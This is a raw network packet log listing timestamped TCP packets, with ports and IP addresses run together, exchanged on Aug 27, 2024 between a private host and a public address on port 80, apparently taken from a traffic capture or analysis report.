                              Aug 27, 2024 09:48:54.213205099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.213228941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.213954926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213965893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213974953 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213984966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.213995934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214005947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214016914 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214018106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214034081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214037895 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214044094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214047909 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214055061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214065075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214081049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214092970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214103937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214108944 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214113951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214123964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214134932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214139938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214145899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214159966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214171886 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214189053 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214380026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214390993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214400053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214412928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214426041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214437962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214441061 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214449883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214461088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214471102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214482069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214493036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214503050 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214510918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214514971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214524984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214534998 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214536905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214559078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214577913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214761019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214771986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214865923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214901924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214912891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214921951 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214932919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214943886 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214945078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.214955091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214966059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214977026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.214984894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215012074 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215034008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215046883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215056896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215068102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215080023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215090036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215101004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215101957 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215112925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215123892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215131044 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215148926 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215712070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215722084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215733051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215744019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215754986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215769053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215770006 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215780973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215791941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215804100 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215814114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215826988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215836048 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215837955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215852976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215861082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215871096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215872049 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215883970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215894938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215897083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215905905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.215917110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.215943098 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.239703894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.239729881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.239739895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.239816904 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.239818096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.239829063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.239837885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.239850044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.239871025 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.239949942 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.306451082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306509972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306521893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306534052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306545019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306555986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306566954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306668043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.306828022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306838989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306848049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306859970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306870937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306881905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306893110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306953907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.306983948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.306989908 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307090044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307100058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307111979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307122946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307127953 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307135105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307145119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307151079 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307156086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307168961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307180882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307204008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307204008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307224035 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307333946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307344913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307466030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307502985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307512999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307523012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307533979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307544947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307555914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307566881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307578087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307585001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307589054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307599068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307609081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307620049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307631969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307641983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.307671070 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.307696104 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308054924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308065891 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308077097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308089018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308098078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308108091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308119059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308130026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308139086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308151007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308160067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308198929 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308229923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308247089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308285952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308376074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308387041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308396101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308407068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308418036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308428049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308443069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308453083 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308458090 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308463097 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308473110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308489084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308540106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308558941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308747053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308758020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308768034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308778048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308788061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308796883 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308809042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308820009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.308824062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.308896065 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309073925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309084892 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309093952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309104919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309115887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309127092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309145927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309180021 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309231997 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309243917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309254885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309267044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309269905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309278965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309288979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309294939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309299946 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309310913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309320927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309320927 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309336901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309340954 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309349060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309360027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.309361935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.309442043 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.310122967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310134888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310144901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310156107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310167074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310178041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310189009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310199976 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310201883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.310210943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310215950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.310220957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310231924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310241938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310245037 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.310252905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310265064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310275078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310281992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.310286045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.310305119 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.328480005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.328500032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.328509092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.328567982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.328572989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.328579903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.328591108 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.328603029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.328610897 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.328648090 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.328696966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397233009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397253036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397264957 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397283077 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397294044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397304058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397316933 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397332907 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397355080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397366047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397383928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397394896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397417068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397443056 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397480965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397499084 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397512913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397524118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397526026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397535086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397559881 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397587061 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397723913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397742033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397753954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397763968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397777081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397785902 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397809029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397872925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397882938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397887945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397893906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397900105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.397918940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.397950888 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.398005009 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.398068905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.398080111 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.398109913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.398195028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.398277998 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.398966074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.398993015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399004936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399034977 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.399169922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399182081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399223089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399234056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399264097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.399287939 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.399360895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399374008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399382114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399393082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399403095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399413109 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.399415016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399485111 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.399667025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.399755001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.401710033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.401727915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.401737928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.401842117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.401863098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.401906013 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.401932955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402035952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402050018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402077913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402108908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402152061 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402232885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402374029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402384043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402416945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402431011 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402465105 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402476072 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402486086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402523041 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402611017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402621984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402631998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402643919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402656078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:54.402657986 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402697086 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:54.402775049 CEST8061383188.114.97.3192.168.2.5
